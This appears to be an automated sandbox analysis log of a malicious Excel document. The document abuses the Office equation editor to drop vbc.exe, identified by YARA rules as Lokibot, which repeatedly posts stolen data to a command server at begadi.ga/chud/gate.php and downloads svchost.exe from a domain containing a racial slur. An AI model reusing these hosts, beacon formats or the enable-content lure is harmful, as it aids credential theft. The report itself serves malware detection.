              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00404ED4 recv,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9981CA08.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /secure/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chnesstdyqudusisabadassniggainthestfmv.ydns.euConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: chnesstdyqudusisabadassniggainthestfmv.ydns.eu
              Source: unknownHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Dec 2020 07:33:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/7.3.24RC1Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: vbc.exe, 00000005.00000002.2391453464.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://begadi.ga/chud/gate.php
              Source: vbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: vbc.exe, vbc.exe, 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: document is protected 16 ~ 17 18 19 20 21 Open the document In If this document was 22 Micr
              Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 25 26 27 28 :: 31 0 0 0 0 0 q 32 " 33 0 0 0 0 0 q
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00370404 NtQueryInformationProcess,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0037A028
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0037801F
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0037E868
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003730A8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003704D0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00372198
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0037EAC8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00370FC0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00379028
